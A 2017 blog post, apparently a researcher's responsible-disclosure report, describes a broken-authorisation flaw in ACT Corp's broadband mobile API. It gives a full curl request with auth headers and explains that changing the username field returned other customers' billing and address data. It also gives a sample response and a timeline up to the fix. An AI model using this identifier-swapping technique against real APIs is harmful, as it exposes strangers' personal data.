Abhay Rana aka Nemo

Vulnerability Report: ACT Corp

ACT, for those who don’t know is one of India’s most popular broadband providers.

This is a very brief and concise summary.

  • ACT has a mobile application
  • That allows you to login and check your plan details, data usage etc
  • I’ve been wanting to build a command line application that lets me check the balance easily
  • I tried scripting their website, but it was too much javascript.
  • The mobile app uses an API to do the same
  • The API happens to have really bad auth
  • Got fixed almost 3 months after reporting this.


curl https://myfibernet.actcorp.in/api/user/plandetails -H "Content-Type: application/json" -H "Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469" -H "Apiversion: 1.0" -H "Appversion: 32" -H "Devicetype: 1" -H "Deviceid: 68590327e3e0ca81" -H "Mobilenumber: 9999999999" -H "Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216" --data '{"username":"11111111"}'

The API responds back with the following:

  "code": 200,
  "status": true,
  "message": "Success",
  "data": {
    "plan_details": {
      "agreement_info": {
        "agreement_no": "XXXXXXXXXX",
        "promotion_code": "",
        "package_code": "ACTESS01M",
        "package_name": "",
        "agreement_startdate": "DD/MM/YYYY",
        "expiry_date": "",
        "status": "",
        "entity_code": "[]",
        "subscription_period": "[]",
        "payterm": "[]",
        "billingcycle_code": "[]",
        "contract_type": "ISP",
        "outlets": "1",
        "service_points": "",
        "package_tenure": int,
        "due_date": ""
      "product_info": {
        "product_code": "",
        "product_desc": ""
    "plan_usage_info": {
      "service_id": "ACTESS01M",
      "service_name": "ACTESS01M",
      "outbyteslimit": 322122547200,
      "outbytesremaining": 153400581140,
      "outbytesused": 168721966060
    "bill_info": {
      "accountno": "111111112233",
      "subscribername": "NAME",
      "phonenumber": "PHONENUMBER",
      "address": {
        "line1": "YUP",
        "line2": "THESE TWO LINES WERE FILLED",
        "line3": "",
        "district": "AND THIS",
        "city": "BANGALORE",
        "state": "KARNATAKA",
        "country": "India"
      "billno": "10000001111",
      "billdate": "DD/MM/2016",
      "account_period": "01/MM/2016-30/MM/2016",
      "previous_due": "",
      "current_invoice_amt": "1234",
      "total_due": "0",
      "bill_due_date": "15 Nov 2016"

Some of these are empty fields, and some values that I didn’t understand I’ve replaced with [].

The fun part is that the request is actually a POST and contains the following data:


I happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.

Almost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know what that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).

If you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.

I’ve reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!

Update: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).


Date Details
29 Nov 2016 Vulnerability Identified
29 Nov 2016 Email sent to ACT, no response
6 Dec 2016 Email sent with partial customer details to explain scope of the issue, no response
8 Dec 2016 Reminder sent, no response
20 Jan 2017 Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response
23 Jan 2017 Accidentally an investor in ACT saw my tweet and responded over twitter. Send a writeup, along with the suggestion to take down the application
24 Jan 2017 ACT reports issue is fixed. I test and report back as fixed the next day
26 Mar 2017 Report published

However, the huge timeline involved here pretty much guarantees that if you are an ACT customer, your data is out there in the public.

Published on March 26, 2017 in security,apis